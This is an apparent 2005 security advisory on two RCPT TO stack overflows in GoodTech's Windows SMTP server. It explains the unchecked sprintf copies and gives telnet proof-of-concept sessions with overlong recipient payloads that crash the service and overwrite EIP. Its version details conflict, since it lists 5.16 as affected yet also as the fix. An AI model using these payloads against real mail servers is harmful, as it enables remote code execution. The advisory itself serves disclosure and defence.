Arbitrary code execution in GoodTech's SMTP server discovered by Raphaël Rigo Product: SMTP server by GoodTech Systems Affected Version: 5.16 Evaluation (verified), <= regged and 5.15 probably too Not affected Version: 5.17 OS affected: All WinNT (NT/2K/XP/2K3) Risk: Critical Remote Exploit: yes URL: http://www.goodtechsys.com/smtpdnt2000.asp Overview ======== The product provides Simple Mail Transfer Protocol (SMTP) to any email client out of the box. It forwards email messages directly to their recipients. GoodTech SMTP server runs as a service on the host Windows machine. Vulnerabilities =============== 1) Stack overflow in RCPT TO command handling Unchecked string copies allow a classic stack overflow. Details : A cascade of unchecked string copies is responsible for this vulnerability : - The maximum length of a command is 4096. - The requested email is copied without checking nor direct consequences into a 2048 bytes buffer. - The domain is extracted and copied without checking nor direct consequences into a 256 bytes buffer. - The following code is executed : sprintf(buf,"mx.%s",domain) buf is only 64 bytes long, and can thus be overflowed, overwriting a string containing the DNS server to be used to find the MX request. - This string being non-empty, the following code is executed: sprintf(buf1024, "Using DNS Server %s", dnsserver) but since we have ~4000 bytes for the domain, this can overflow and overwrite the return address of the function, allowing arbitrary code execution. Risk : Critical The attacker may execute arbitrary code with the privileges of the SYSTEM user (by default). Proof of concept : $ telnet localhost 25 Connected to localhost. Escape character is '^]'. 220 test Simple Mail Transfer Service Ready. Version 5.15 (Evaluation) HELO aaa 250 OK RCPT TO: Connection closed by foreign host. Service crashes with EIP==0x41414141 Workaround : There is no possible workaround. Solution : Update to v5.16 ----------------------------------------------------------------------- 2) Stack overflow in multiple RCPT TO commands handling Unchecked string copy allows a classic stack overflow. Details : For each RCPT TO command, the server fills a 1300 bytes structure containing the requested command and the MX server for the requested email. The server allows up to 99 RCPT TO for a single mail, but the filling of this structure is done via unchecked string copy : the command, up to 4096 bytes long, is copied without checking into the structure. This behaviour allows us to overwrite the return address of the thread by issuing a long command in the 99th RCPT TO command. We have then to issue a QUIT command to exit the thread and execute our code. Risk : Critical The attacker may execute arbitrary code with the privileges of the SYSTEM user (by default). Proof of concept : $ telnet localhost 25 Connected to localhost. Escape character is '^]'. 220 test Simple Mail Transfer Service Ready. Version 5.15 (Evaluation) HELO aaa 250 OK -- Repeat this part 98 times RCPT TO: 250 OK -- RCPT TO: <|'A'x2600|@localhost> 250 OK QUIT Connection closed by foreign host. Service crashes with EIP==0x41414141 Workaround : There is no possible workaround. Solution : Update to v5.16 ----------------------------------------------------------------------- Acknowledgments =============== Thanks to the developer for quick response and fix. Timeline ======== 2005-07-19 Discovery 2005-07-21 First attempt to contact developer 2005-07-21 Developer reply 2005-07-22 Fixed version released 2005-07-23 Advisory published